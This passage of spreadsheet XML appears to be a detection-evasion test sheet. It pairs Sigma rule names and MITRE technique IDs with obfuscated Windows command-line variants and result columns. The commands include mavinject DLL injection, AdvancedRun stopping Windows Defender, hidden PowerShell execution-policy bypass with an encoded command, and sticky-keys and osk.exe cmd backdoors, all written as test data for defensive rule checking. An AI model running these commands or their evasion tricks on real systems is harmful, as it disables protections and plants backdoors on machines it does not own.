          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INJECTRUNNING\tC:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B8" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B9" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C9" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D9" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E9" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 -"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F9" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E10" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /iNJECTRUnniNg\tC:\TEmp\evIl.dll</t>
        </is>
      </c>
      <c r="F10" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E11" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /InJeCTruNNinG\TC:\temP\EVil.DLL</t>
        </is>
      </c>
      <c r="F11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E12" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" cmd.exe "/Run"</t>
        </is>
      </c>
      <c r="F12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="44" t="n"/>
      <c r="J12" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K12" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E13" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename cmd.exe -Run</t>
        </is>
      </c>
      <c r="F13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="44" t="n"/>
      <c r="J13" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E14" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy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F14" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="43" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B15" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C15" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D15" s="43" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E15" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -"ExecutionPolicy"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F15" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B16" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C16" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D16" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E16" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden /"ExecutionPolicy" Bypass -enc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F16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="44" t="n"/>
      <c r="J16" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="44" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E17" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOPRoFiLE -"WindowStyle" Hidden -"ExecutionPolicy" Bypass -eNcoDEDCOmmaNd VGhpcyBpcyBhIGZha2UgYmFzZTY0IGVuY29kZWQgc2NyaXB0IHRoYXQgbG9hZHMgU2hhcnBTdWNjZXNzb3JfcmVub21lZC5kbGwgYW5kIGluaXZva2VzIGl0cyBlbnRyeVBvaW50IHdpdGggYXJndW1lbnRzICJhZGQiICIvaW1wZXJzb25hdGUiICJDOlx0ZW1wIiAiL2FjY291bnQiICJBZG1pbmlzdHJhdG9yIiAiL25hbWUiICJUYXJnZXQi</t>
        </is>
      </c>
      <c r="F17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="44" t="n"/>
      <c r="J17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C18" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D18" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E18" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="44" t="n"/>
      <c r="J18" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C19" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D19" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E19" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="n"/>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B22" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C22" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D22" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E22" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs  8 /Run</t>
        </is>
      </c>
      <c r="F22" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K22" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="44" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E23" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" "/RunAs" 8 /Run</t>
        </is>
      </c>
      <c r="F23" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K23" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B24" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C24" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D24" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E24" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 -CommandLine "stop WinDefend" /StartDirectory "" -RunAs 8 /Run</t>
        </is>
      </c>
      <c r="F24" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K24" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B25" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C25" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D25" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E25" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 /"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INJECTRUNNING\tC:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B27" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C27" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D27" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="44" t="n"/>
      <c r="J27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="44" t="n"/>
      <c r="J28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 -"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /InJeCTruNNinG\TC:\temP\EVil.DLL</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="44" t="n"/>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E31" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F31" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K31" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E32" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F32" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>cmd /c "m""klink C:\Windows\System32\osk.exe C:\Windows\System32\cmd.exe"</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="44" t="n"/>
      <c r="J33" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B34" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C34" s="44" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D34" s="44" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E34" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy /Y "C:\Windows\System32\cmd.exe" "C:\Windows\System32\sethc.exe"</t>
        </is>
      </c>
      <c r="F34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K34" s="43" t="b">
        <v>0</v>
      </c>
    </row>
